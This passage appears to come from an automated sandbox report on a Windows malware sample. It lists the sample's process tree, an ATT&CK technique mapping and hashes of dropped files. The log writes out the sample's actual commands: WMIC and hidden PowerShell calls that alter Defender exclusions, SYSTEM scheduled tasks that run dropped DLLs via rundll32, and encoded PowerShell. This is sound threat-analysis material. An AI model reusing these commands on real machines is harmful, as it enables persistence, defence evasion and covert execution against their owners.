PID:1700 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2240
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2916
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\MaCEdJmjU\szzNjM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "dZgNXlBFHKJPYkR" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dZgNXlBFHKJPYkR2" /F /xml "C:\Program Files (x86)\MaCEdJmjU\rejZDPf.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dZgNXlBFHKJPYkR"3⤵PID:2816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dZgNXlBFHKJPYkR"3⤵PID:2024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RnVvAZaQEByRQe" /F /xml "C:\Program Files (x86)\zWTlFEDWyZjU2\BkLeqNI.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bxpvtvpljnCBk2" /F /xml "C:\ProgramData\hDwfgHvtnjxOxeVB\FFvMggw.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dfBKvmetieHVblCDx2" /F /xml "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR\jYSNcTR.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UKqBjuPeLLAHSylBWrg2" /F /xml "C:\Program Files (x86)\CYZcjjLrQSSSC\YlWuqsp.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rrUPsTjgSYBWMUseO" /SC once /ST 04:42:12 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QpEhKTiRofuFzpEd\yUyAIlrQ\CRfojXT.dll\",#1 /gzLLdidVZe 525403" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "rrUPsTjgSYBWMUseO"3⤵PID:892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LTdmnWMddFrWELagp"3⤵PID:1768
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 15563⤵
- Loads dropped DLL
- Program crash
PID:2960
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QpEhKTiRofuFzpEd\yUyAIlrQ\CRfojXT.dll",#1 /gzLLdidVZe 5254032⤵PID:1276
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QpEhKTiRofuFzpEd\yUyAIlrQ\CRfojXT.dll",#1 /gzLLdidVZe 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3000 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rrUPsTjgSYBWMUseO"4⤵PID:1628
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E9DF4908-5695-4DAA-8304-5913600E82D3} S-1-5-21-3502430532-24693940-2469786940-1000:PSBQWFYT\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2828
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1560
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2532
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2932
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:924
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2744
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1744901112187078600011220915002101587676-1492275783612922105709375028379580899"1⤵PID:2660
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ec8d642ef6bbc8f5076e447b9f7e0e4b
SHA19ae7a122c3329a7d4ff6297c80bac441e4e2a835
SHA2567e4e6797111f818e3c890b5b3a3ba110b073590a2cef49f83a9f3699eb5ea8cd
SHA512edba6af3f9f0eb338d5bf2842a0aa5e557dec22dddd54a72f6cdbb7edbe2b67bebf16acae6845bd2dcbfc86d91cf432310a901978bcb7b7b2d37f9b4adacf41c
-
Filesize
2KB
MD59e0975ad6029911a3e725b516747f2cc
SHA172da298aaf7ccd52fc2aa4c30428635428439eec
SHA2566b795ba6be75f7484af5515f6bf6f37162b1384be8e61e45c49404ae65bbaa92
SHA5123810b7181955fb0db341042f30fd10ff9096ee2fb4ce80bda238f2d348fe47c3cee4edc9eb8320a25c1d2436c0f22f12fad29ffd023fd0c63b148b3bbb79ccdb
-
Filesize
2KB
MD51e36eadb9fa0cd501d01182f7252bfc8
SHA1d15dbb81b17cef98f88c94248ca54ba84ea89e07
SHA256eff48282c5ead7e40f29efa79647732f7fc4c706d2ddb4a4328f339715659ee2
SHA5128fb08bc6edb702e60ac8df47e70090918d8908d1943faf56ffb46591a9a95b4b166f53f38de794442ae588a449384dca7cfb7d6d4ccfd0400d8e0896db2a2b64
-
Filesize
2KB
MD54d6bac0845b3cfd933de9524223df0e0
SHA14290ef99453e6163165e7483c0b1c7bf11448c4d
SHA2561a89a3fa833bec51b28b0dd64f00edc511bdb2d6df8ec0318a9e4d1bbca987af
SHA512a4fc0ee81da15c93ff1914b373b5f09ee8af0972ed8048f2483c2b107f543aa99dc357a0d432b01cbeb6ace0182a312e64f81f75410a03cbd193c900cbe0eeb9
-
Filesize
2.5MB
MD571a261ae47864aa3532236af7f8959cf
SHA1719906f5ad873f1f7246de060e7287faf8f2c1a7
SHA256fb4d99fde7d73bb07824aebb585f8f898d7206bcdf9236acc9ef4369dc8e438b
SHA512183bd79ee88cb74321906f76ab547489811f3cdd416352b9f19de0a6bb5f8205d27005c6501c992c28e1189b4a81be4c67fbf4f2e897c825d0e636c6f9b645d3
-
Filesize
2KB
MD59188454148621069418aa040e48f9b49
SHA1b950947e07beec4d5b561235196652fd73b0f59d
SHA25611c6e8a70e5f157373b7be8fae6f54a7ee8a2e7cf1116bee0e6597e82b46dfaf
SHA512ba04752759fcff5faa546bdbc5f2451324fefae6db5dd458dd7e0fcc51aed45b177ea36d9fd48455ab611bb5f19d231ac52fb658eb7eece146bbffb059ac07c6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5862496cc66b72997f27cc4f161e757fe
SHA1f93d0cec5880e8921708d05d643557e6bba77174
SHA25654e1236b02afc30f0daa7aaa09e51b7f55d537d0e48aca05348c5c291fdde5cd
SHA51280267b908440a1f3326104ea325f8eac24da0d1b3f6deee3159028cd572560df7aed955429a1dd39c67fd71cbddbabd4de607fb3ca74d217dea9360a42770947
-
Filesize
28KB
MD590ef2f32488739dc6eda5d67c873f987
SHA1cac7e334d0c9f30acd9e9c538ab6a6e46a3118dc
SHA25620c34cc822e3d7945602e7e49d700375f9be6d8afd019ae9c6edeebfe257dda8
SHA5127c877dbce7de0c34a88883059de86cd2104f805c2a8bc5aec41706855ad8add94de523e84733766055617f148dbd28fcb3c8c36f2e3f0f6e406e1d3658e4a718
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DFTOYRG8R5OOI32KOBV.temp
Filesize7KB
MD58b5be526d65e671aa26cf4cddca3e51a
SHA1a4baf155d286549248eafbd1c5b9142871031f72
SHA25620ef2d5dbd63c5961877ee708bd2209fee5ec8ee9d60df923b6130c5154d7f97
SHA512b2fa529a06b0c17974bc0d5915dbb78b713f538ad3aa4c9e3c39f6546259866bae2be7768be91386c70c3a339c02546a74f305097f00c6a3d22fd58eb4b14e6f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5438018fbeb7af13f6e27ccc0501f738a
SHA170c7531a0edcd53d4f1f9f7bbdc0155bbb7f8746
SHA256572c3b352e061a266fcd4579e10205dc3d9dd6e9639a3c14f9593eaa7f08b7b1
SHA5129c2a5984cbe343bacbf5d2c780c781f3f038abc505c6f2a7e76cde4b48ce914c3ca72505bb10c3d3eefa518eebbb58a5d3f4bbc38bf8ee18ff44dfcbbd7afeb2
-
Filesize
7KB
MD589e26a2b3bc7b497c5134d1737118133
SHA158a582e07448eafd2d7cd5161698fff8d5c9dbfa
SHA256f8842efab886c4b9f90a86efa5e51357811bbc80022ea5357cb4a9ac61f16f41
SHA512f90e04bb9083f2d108c2db41bec9e1da7cd48e25298b2e16bf60adb0acf09471de0419db4410b42d6de55da4a7c6931d25f500ff9fe7aea399f40bccd0b0c164
-
Filesize
9KB
MD55ab82674f3357670f515825c91a927bc
SHA1bc6eeb548d5623eb48fad56009f6eecc3f459525
SHA2567eeb62ec2d0666c06b6f0b01ce153e5f5428d122a329b3c74ff5e9717e4fff15
SHA5126b0ec8b9265226885a9b000024acbadac2f89585934f1006eea4efc969118dfde55f0a1dfc03b63a31651cdb6b91140c57daab32b295145463760511a92c4cb0
-
Filesize
5KB
MD57ac1c29e74a29826aa3958ace292e749
SHA1113b6a237db1140203123728bbb9ede43314ac77
SHA256153db52824e3389b65ccbe55d41d518d422e99347257d0fd7c9fa30c2d1623cd
SHA512e66574d796e8939d09f814a293f8a7e213fc7015a2e4e5bcaed9004b624729833af9e626c643c971dbce98abed9fecc9c4676bac9104d6fae2f2cf842c8c54d9
-
Filesize
6.4MB
MD5937a707de797e2cd82db6cb1e7bd8028
SHA10e0a041836fb513d4c3325d1cee07d60c72908ec
SHA2568007a258a3ce141de8381da8d049886aed118feeb86bd0d358678a33116d42f3
SHA5128a3361aa4a677f3435e0e4c66d45844bec6da9fad15113a51643df1eb110c6ef44f4c59b91f366f5c4e7cc900d01af71f1d002639ecd1a9caf848f07a2c6bab2
-
Filesize
6.7MB
MD54a6234985179c24fab6e1ca0c926d8b7
SHA153e1858155418e1c0b163bfc796af17c20f9293d
SHA2565d451382e517894f68583cd635aa094378c963c2fd67517d2d1466807da4e41e
SHA5125916a7c4d9ed751cb7a494ab8b3444a59c635b2768bb2d395b8917b306cc07b66206d2ccf4b784ca4afdf0edce1b1f2c1ca6365d480cb42aaf40492770b3c6de
-
Filesize
6.5MB
MD50adf6200e5ae41efdcb874ef6c181c18
SHA13d65aeb9d1411f437aaa3a34218327a2d8503860
SHA25625e86744bd0c1402446e21fe0729f19dfb3b865a6d0e4ce597f3d5793ef75ea1
SHA51253efdd8cc69c145b38af00a5ceaa0a7b3f102966f95f967a879a71dd750aae86786c5a85e50111176bc363f57a6453aebe06a34df87a23730c1b1f76d9df7107